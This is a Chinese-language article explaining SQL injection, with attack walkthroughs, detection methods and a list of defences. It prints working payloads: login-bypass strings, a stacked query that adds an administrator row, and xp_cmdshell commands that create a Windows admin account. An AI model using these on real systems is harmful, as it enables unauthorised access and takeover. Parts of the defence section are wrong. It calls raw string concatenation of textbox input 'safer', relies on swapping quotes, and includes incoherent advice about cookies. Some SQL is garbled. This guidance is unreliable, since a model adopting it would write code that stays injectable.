例如Web系統有一個login頁面，這個login頁面控制著用戶是否有權訪問，要求用戶輸入一個用戶名和口令，連接資料庫的語句為：

“select * from users where username = 'username' andpassword = 'password'”

攻擊者輸入用戶名為aa or 1=1口令為1234 or 1=1之類的內容。我們可以看出實際上攻擊者並不知道真正的用戶名、口令，該內容提交給伺服器之後，伺服器執行攻擊者構造出的SQL命令，但由於攻擊者輸入的內容非常特殊，所以最後得到的SQL命令變成：

“select * from users where username = 'aa' or 1=1 andpassword = '1234' or 1=1”

伺服器執行查詢或存儲過程，將用戶輸入的身份信息和資料庫users表中真實的身份信息進行核對，由於SQL命令實際上已被修改，存在永遠成立的1=1條件，因此已經不能真正驗證用戶身份，所以系統會錯誤地授權攻擊者訪問。

SQL 注入是通過目標伺服器的80埠進行的，是正常的Web訪問，防火牆不會對這種攻擊發出警告或攔截。當Web伺服器以普通用戶的身份訪問資料庫時，利用SQL注入漏洞就可能進行創建、刪除、修改資料庫中所有數據的非法操作。而當資料庫以管理用戶許可權的身份進行登錄時，就可能控制整個資料庫伺服器。

SQL注入的方法很多，在以手動方式進行攻擊時需要構造各種各樣的SQL語句，所以一般攻擊者需要豐富的經驗和耐心，才能繞過檢測和處理，提交語句，從而獲得想要的有用信息。這個過程需要花費很多的時間，如果以這種手動方式進行SQL注入漏洞攻擊，許多存在SQL注入漏洞的ASP、JSP、PHP、JAVA等網站就會安全很多了，不是漏洞不存在了，而是手動入侵者需要編程基礎，但現在攻擊者可以利用一些現成的黑客工具來輔助SQL注入漏洞攻擊，加快入侵的速度，使SQL注入變得輕而易舉。

由於SQL注入漏洞攻擊利用的是通用的SQL語法，使得這種攻擊具有廣泛性。理論上說，對於所有基於SQL語言的資料庫管理系統都是有效的，包括MSSQLServer、Oracle、DB2、Sybase和MySQL等。當然，各種系統自身的SQL擴展功能會有所不同，因此最終的攻擊代碼可能不盡相同。

1. 3 SQL注入漏洞攻擊過程

(1)繞過身份驗證

如一個login界面，需要輸入用戶名和口令，然後Post到另一個頁面，進行身份驗證,因此攻擊者只需在用戶名和口令的輸入框中都輸入aa or’1’=’1’的內容，那麼攻擊者就可以通過欺騙的驗證方式而直接進入下一個頁面，並擁有和正常登錄用戶一樣的全部特權。原因是什麼呢? 我們比較一下正常用戶登錄和攻擊者登錄時的兩種SQL語句：

1)正常用戶(如用戶名為admin，口令為1234567) ：

SQL= " selectfrom users where username = ’admin’and password= ’1234567’ ";

2)攻擊者(用戶名和口令都為aa or’1’=’1’) ：

SQL= " select * from users where username='aa or’1’=’1’'and password = ' aa or’1’=’1’'";

可以看到由and連接的兩個條件都被一個永遠成立的1=1所代替，執行的結果為true，資料庫會認為條件恆成立，會返回一個true，讓攻擊者以合法身份登錄進入下一個頁面。

(2)執行非法操作

如一個查詢頁面select1.asp? id=1，編程人員原本設計意圖是顯示id為1的查詢信息，而攻擊者利用程序中沒有對id內容進行檢查的機制，插入自己的代碼。

從select1.asp中摘錄一段關鍵代碼：

SQL= " select *from photo where photoid= 'id'";

可以看到，id沒有進行任何的處理，直接構成SQL語句並執行，而攻擊者在知道該系統資料庫中表名及欄位名的情況下，利用SQL語句特性(分號是將兩句SQL 語句分開的符號)，直接向資料庫Tuser表中添加記錄：

select1.asp? id= 1;Insertinto Tuser (username,password,type) values ('hack','1234567','管理員')，然後攻擊者就可以直接用hack進行登錄了。通過這樣的方法，攻擊者還可以對系統做任何的事情，包括添加、刪除、修改系統資源的操作。

(3)執行系統命令

如果Web主機使用MSSQL資料庫管理系統，那麼攻擊者就可以用到xp_cmdshell這個擴展存儲過程，xp_cmdshell是一個非常有用的擴展存儲過程，用於執行系統命令，比如dir、net等，攻擊者可以根據程序的不同，提交不同的語句：

execmaster.dbo.xp_cmdshell " dir "; exec master.dbo.xp_cmdshell" net user hack 1234567 /add ";

execmaster.dbo.xp_cmdshell " net localgroup administrators hack /add ";

這樣就可以向Web主機系統中成功添加了一個管理員帳戶。

2. SQL注入漏洞攻擊的檢測方式及方法

2. 1檢測方式

SQL注入漏洞攻擊檢測分為入侵前的檢測和入侵後的檢測。入侵前的檢測，可以通過手工方式，也可以使用SQL注入漏洞掃描工具軟體。檢測的目的是為預防SQL注入漏洞攻擊，而對於SQL注入漏洞攻擊後的檢測，主要是針對審計日誌的查看，SQL注入漏洞攻擊成功後，會在Web Service和資料庫的審計日誌中留下“痕跡”。

2. 2檢測方法

(1)動態SQL檢查

動態的SQL語句是一個進行資料庫查詢的強大的工具，但把它和用戶輸入混合在一起就使SQL注入成為了可能。將動態的SQL語句替換成預編譯的SQL或者存儲過程對大多數應用程序是可行的。預編譯的SQL或者存儲過程可以將用戶的輸入作為參數而不是命令來執行，這樣就限制了入侵者的行動。當然，它不適用於存儲過程中利用用戶輸入來生成SQL命令的情況。在這種情況下，用戶輸入的SQL命令仍可能得到執行，資料庫仍然存在SQL注入漏洞攻擊的危險。

(2)有效性校驗

如果一個輸入框只可能包括數字，那麼要通過驗證確保用戶輸入的都是數字。如果可以接受字母，檢查是不是存在不可接受的字元，那就需要設置字元串檢查功能。確保應用程序要檢查以下字元：分號、等號、破折號、括弧以及SQL關鍵字。

(3)數據表檢查

使用SQL注入漏洞攻擊工具軟體進行SQL注入漏洞攻擊後，都會在資料庫中生成一些臨時表。通過查看資料庫中最近新建的表的結構和內容，可以判斷是否曾經發生過SQL注入漏洞攻擊。

(4)審計日誌檢查

在Web伺服器中如果啟用了審計日誌功能，則Web Service審計日誌會記錄訪問者的IP地址、訪問時間、訪問文件等信息，SQL注入漏洞攻擊往往會大量訪問某一個頁面文件(存在SQL注入點的動態網頁)，審計日誌文件會急劇增加，通過查看審計日誌文件的大小以及審計日誌文件中的內容，可以判斷是否發生過SQL注入漏洞攻擊事件;另外還可以通過查看資料庫審計日誌，查詢某個時間段是否有非法的插入、修改、刪除操作。

(5)其他

SQL注入漏洞攻擊成功後，入侵者往往會添加特權用戶(如：administrator、root、sa等)、開放非法的遠程服務以及安裝木馬後門程序等，可以通過查看用戶帳戶列表、遠程服務開啟情況、系統最近日期產生的一些文件等信息來判斷是否發生過入侵。

3. SQL注入漏洞防範措施

SQL注入漏洞攻擊的防範方法有很多種，現階段總結起來有以下方法：

(1)數據有效性校驗。如果一個輸入框只可能包括數字，那麼要通過校驗確保用戶輸入的都是數字。如果可以接受字母，那就要檢查是不是存在不可接受的字元，最好的方法是增加字元復雜度自動驗證功能。確保應用程序要檢查以下字元：分號、等號、破折號、括弧以及SQL關鍵字。另外限製表單數據輸入和查詢字元串輸入的長度也是一個好方法。如果用戶的登錄名最多隻有10個字元，那麼不要認可表單中輸入10個以上的字元，這將大大增加攻擊者在SQL命令中插入有害代碼的難度。

(2)封裝數據信息。對客戶端提交的數據進行封裝，不要將數據直接存入cookie中，方法就是在編程的代碼中，插入session、if、try、else，這樣可以有效地防止攻擊者獲取cookie中的重要信息。

(3)去除代碼中的敏感信息。將在代碼中存在的用戶名、口令信息等敏感欄位刪除，替換成輸入框。

SQL=" select from users where username = ’admin’and password= ’1234567’ "

如：這樣顯然會暴露管理員的用戶名、口令信息。可以將其修改成：

SQL= " select * from users where username='" +Txtuser.Text + "' and userpwd='" + Textpwd.Text + "'"

這樣就安全了很多，入侵者也是不會輕易的就獲取到用戶名、口令信息。

(4)替換或刪除單引號。使用雙引號替換掉所有用戶輸入的單引號，這個簡單的預防措施將在很大程度上預防SQL注入漏洞攻擊，單引號時常會無法約束插入數據的Value，可能給予輸入者不必要的許可權。用雙引號替換掉單引號可以使大部分SQL注入漏洞攻擊失敗。 如：

“select* from users where username='" + admin + "' and userpwd='" + 1234567+ "'”

顯然會得到與

“select * from users where username='admin' and password= '1234567'”

相同的結果。

(5)指定錯誤返回頁面。攻擊者有時從客戶端嘗試提交有害代碼和攻擊字元串，根據Web Service給出的錯誤提示信息來收集程序及伺服器的信息，從而獲取想得到的資料。應在Web Service中指定一個不包含任何信息的錯誤提示頁面。

(6)限制SQL字元串連接的配置文件。使用SQL變數，因為變數不是可以執行的腳本，即在Web頁面中將連接資料庫的SQL字元串替換成指定的Value，然後將Web.config文件進行加密，拒絕訪問。

(7)設置Web目錄的訪問許可權。將虛擬站點的文件目錄禁止遊客用戶(如：Guest用戶等)訪問，將User用戶許可權修改成只讀許可權，切勿將管理許可權的用戶添加到訪問列表。

(8)最小服務原則。Web伺服器應以最小許可權進行配置，只提供Web服務，這樣可以有效地阻止系統的危險命令，如ftp、cmd、vbscript等。

(9)鑒別信息加密存儲。將保存在資料庫users表中的用戶名、口令信息以密文形式保存，也可以對users表進行加密處理，這樣可以大大增加對鑒別信息訪問的安全級別。

(10)用戶許可權分離。應盡可能的禁止或刪除資料庫中sa許可權用戶的訪問，對不同的資料庫劃分不同的用戶許可權，這樣不同的用戶只能對授權給自己的資料庫執行查詢、插入、更新、刪除操作，就可以防止不同用戶對非授權的資料庫進行訪問。

4. 結束語

SQL注入漏洞攻擊在網上非常普遍，許多ASP、PHP論壇和文章管理系統、下載系統以及新聞系統都存在這個漏洞。造成SQL注入漏洞攻擊的主要原因是開發人員在系統開發的過程中編程不規范，沒有形成良好的編程習慣，問題的解決只有依賴於規范編程。此外，也可以使用現有的SQL注入漏洞掃描器對整個網站中的關鍵代碼進行掃描，查找網站頁面中存在的SQL注入點。對於有問題的頁面，可以及時刪除或更新。本文通過對SQL注入漏洞攻擊的方法、原理以及攻擊實施過程進行了闡述和總結，並給出了一些常見的SQL注入漏洞攻擊防範的方法。